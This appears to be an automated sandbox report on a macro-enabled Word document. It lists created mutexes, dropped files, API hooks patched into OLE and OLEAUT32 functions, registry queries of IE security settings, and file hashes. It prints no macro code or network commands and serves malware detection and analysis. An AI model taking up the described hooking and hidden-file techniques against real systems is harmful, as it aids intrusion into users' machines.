"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-59802"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-59802"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACBPIDS_S-1-5-5-0-59802"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACB10_S-1-5-5-0-59802"
"Local\ZonesCounterMutex"
"Local\ZonesLockedCacheCounterMutex" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 69210000
- source
- Loaded Module
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "OfficeTooltip" - source
- API Call
- relevance
- 10/10
-
Contains embedded VBA macros
-
Installation/Persistance
-
Dropped files
- details
-
"c93ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Thu Jul 20 20:04:29 2017 mtime=Thu Jul 20 20:04:29 2017 atime=Thu Jul 20 20:04:35 2017 length=753571 window=hide"
"~$3ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.doc" has type "data"
"msoF72F.tmp" has type "GIF image data version 89a 15 x 15"
"index.dat" has type "data"
"~WRS{E05C6FEE-AB1B-4EC4-BEC2-62F2BFCBAA59}.tmp" has type "data"
"~WRS{7E8CC096-A89B-4BC4-BC24-67EEADE93A4E}.tmp" has type "FoxPro FPT blocks size 25600 next free block index 1140850688"
"~WRD0001.tmp" has type "Microsoft Word 2007+"
"~WRS{B5BB78FE-9788-442F-B0CC-7A91197C7A2F}.tmp" has type "data"
"~WRS{9A69F611-DBEE-4B09-9F46-93EB686093F6}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"MSO1045.acl" has type "data"
"~$Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "%WINDIR%\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\USER32.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "%WINDIR%\system32\rsaenh.dll"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "%WINDIR%\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A69F611-DBEE-4B09-9F46-93EB686093F6}.tmp"
"WINWORD.EXE" touched file "%WINDIR%\system32\en-US\MSCTF.dll.mui" - source
- API Call
- relevance
- 7/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "Zj.PnDL/-^"
Heuristic match: "-DwwH\..kR"
Heuristic match: "jN F\ffHR6 d$e&.BO"
Heuristic match: "9s.az"
Pattern match: "EjD0h.isG/0w(l%bBXnCY)U`Jp1Z#pEpf3=Io\n"
Pattern match: "v.Lw/X$_zl__lB"
Pattern match: "3.vl/\7/"
Pattern match: "uQDvQNuy.Dl/B7.wb"
Pattern match: "sY.FFy/m[SDOn_F%{ql"
Heuristic match: "Y-aJQlz7b9KE8K:$DHTWZQ#Q$g.D@wwOz%A*C.sz"
Pattern match: "gt4JMh.qHO/}4uL"
Pattern match: "q.nKK/7CsCy_XjwME@"
Pattern match: "U.xb/&.&g|3.W{H"
Heuristic match: "{%U60c/8iw22J*:6#D|?-h/&9BJ{w-7^5[fYrNAA`nlKsrT *A27IN%.:H.NAD#_enQ{zkw8k|BBYa)XNtF.me6oZ%V5!&*f$/lcK`3c8ga.aG"
Pattern match: "y.ug/nwhTz.]$d4U"
Pattern match: "n.sLa/;B"
Pattern match: "jx.word/_rels/document.xml.relsPK-!FceKword/document.xmlPK-!RY7moword/theme/theme1.xmlPK-!0a.Nvword/vbaProject.binPK-" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
System Security
-
Hooks API calls
- details
-
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
- "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
-
Hooks API calls
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "fffff645" to virtual address "0x6DC27FA4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "26687326" to virtual address "0x693610AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e9365500f3" to virtual address "0x76E53EAE" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "92506d20" to virtual address "0x2FB81B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "c4cab77580bbb775aa6eb8759fbbb77508bbb77546ceb7756138b875de2fb875d0d9b77500000000177930774f9130777f6f3077f4f7307711f73077f2833077857e307700000000" to virtual address "0x70A41000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "e99e4829f4" to virtual address "0x75B83D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "f1cc4326" to virtual address "0x69259904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "e9c532a5f3" to virtual address "0x769A6143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "5dc1beda" to virtual address "0x6DC242C4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "abff8626" to virtual address "0x6C3ACA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "e9239902f3" to virtual address "0x76E55DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "f23d6826" to virtual address "0x6A070BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "4de05051" to virtual address "0x6DC363DC" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "e9603300f3" to virtual address "0x76E54731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "09518626" to virtual address "0x6C72F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "e99a54fff2" to virtual address "0x76E53E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "95a98626" to virtual address "0x6B0778E4" (part of module "OART.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408")
"WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040A") - source
- Registry Access
- relevance
- 3/10
-
Installs hooks/patches the running process
File Details
3135956e280e61d44f42928899dcb3b0105fb35b53b33f85eaa41bc0ad879d83.doc
- Filename
- 3135956e280e61d44f42928899dcb3b0105fb35b53b33f85eaa41bc0ad879d83.doc
- Size
- 736KiB (753571 bytes)
- Type
- docx office
- Description
- Microsoft OOXML
- Architecture
- WINDOWS
- SHA256
- c93ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de
- MD5
- 2f820c69716a98e91fb826ac6c4fe4df
- SHA1
- c457ce1cc07dc55c072cfb5537f1fcbf96e3eca0
Classification (TrID)
- 59.4% (.DOCM) Word Microsoft Office Open XML Format document (with Macro)
- 36.0% (.DOCX) Word Microsoft Office Open XML Format document
- 4.5% (.ZIP) ZIP compressed archive
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 1 process in total (System Resource Monitor).
- WINWORD.EXE /n "C:\c93ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.doc (PID: 2500)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Informative 11
-
-
c93ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 20 20:04:29 2017, mtime=Thu Jul 20 20:04:29 2017, atime=Thu Jul 20 20:04:35 2017, length=753571, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 759323c00b7fff36d55f7aa51be3eac8
- SHA1
- 5277b8a52f76d4af467d9c3602bb4f1fadefff92
- SHA256
- b0b585cc6c3f3f926c21f6a66a20dd1af1111dd0238560b9f371c73721da8831
-
index.dat
- Size
- 257B (257 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5d7f54bdba2b6ea2b60e5a16cc066550
- SHA1
- fb7f2b8a900ca848ff7394b1aa2cc042d482ead7
- SHA256
- b45e229bf333be51b9441c8e78ab95a2a2b6fa2f706194c3dfc4dba47229eddc
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5054e44c674bbaf06c5b6212b8cb9e46
- SHA1
- 245e34cdc49b49494b1b5c68a531111b314a6850
- SHA256
- 3269e03bc22e27936002358fc4845bf4b93ab99df6d5a6fa7767f557dc45d6db
-
~WRS{7E8CC096-A89B-4BC4-BC24-67EEADE93A4E}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 25600, next free block index 1140850688
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 6d00e84e5edaa43e119ea03ce5ecaa4f
- SHA1
- 9fa7d5d09fed0a7c1f8392022eaaa24b66f4e77b
- SHA256
- 957da89085d8855135307e641a71c5ea2284be478c115d7a6c3e9c095e83d407
-
~WRS{9A69F611-DBEE-4B09-9F46-93EB686093F6}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~WRS{B5BB78FE-9788-442F-B0CC-7A91197C7A2F}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5278c0ca47d64764a2a23724d1f4045b
- SHA1
- 43f07600b7b2c1bab3c82df5981e31603401cdb5
- SHA256
- b7d25cc08b7ef1e440f773a5344de8076c262a9a9fded523e68b4cf0c51e68e4
-
~WRS{E05C6FEE-AB1B-4EC4-BEC2-62F2BFCBAA59}.tmp
- Size
- 1.5MiB (1537584 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- d7bb49bbca7863913b88262094cb8dc8
- SHA1
- a84ff2bd05d15deca4c88f92c453b33de13d61dc
- SHA256
- ad7a87bf643eae98c7467c413f85e5dc7f49cc2d61c6584ccedacc06f8062630
-
msoF72F.tmp
- Size
- 663B (663 bytes)
- Type
- img image
- Description
- GIF image data, version 89a, 15 x 15
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- ed3c1c40b68ba4f40db15529d5443dec
- SHA1
- 831af99bb64a04617e0a42ea898756f9e0e0bcca
- SHA256
- 039fe79b74e6d3d561e32d4af570e6ca70db6bb3718395be2bf278b9e601279a
-
~$3ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5054e44c674bbaf06c5b6212b8cb9e46
- SHA1
- 245e34cdc49b49494b1b5c68a531111b314a6850
- SHA256
- 3269e03bc22e27936002358fc4845bf4b93ab99df6d5a6fa7767f557dc45d6db
-
~WRD0001.tmp
- Size
- 1.1MiB (1179648 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- MD5
- 66cf03de6d6bfd7e5b4a8a71eb6c8b00
- SHA1
- 83886c015e8054cdda82e5894eeffce81c6ec512
- SHA256
- 022a721680cf319bb241c457e16bf937d9fd227c0e8abf9deb996ca50c5c1892
-
MSO1045.acl
- Size
- 30B (30 bytes)
- Type
- data
- MD5
- f022bceadff0c8b2c8ce38f19c27f494
- SHA1
- a66d99d484fee1db9dc704fa84e03de3f32bcf8b
- SHA256
- c8b01f5f6dc0c065c7d6bdfb0654a9f293651783db31bd86706e56ea7a7b839e
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Extracted file "~$3ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/3269e03bc22e27936002358fc4845bf4b93ab99df6d5a6fa7767f557dc45d6db/analysis/1500581474/")
- Extracted file "~WRD0001.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/022a721680cf319bb241c457e16bf937d9fd227c0e8abf9deb996ca50c5c1892/analysis/1500581478/")
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "registry-25" are available in the report
- Not all sources for signature ID "registry-55" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)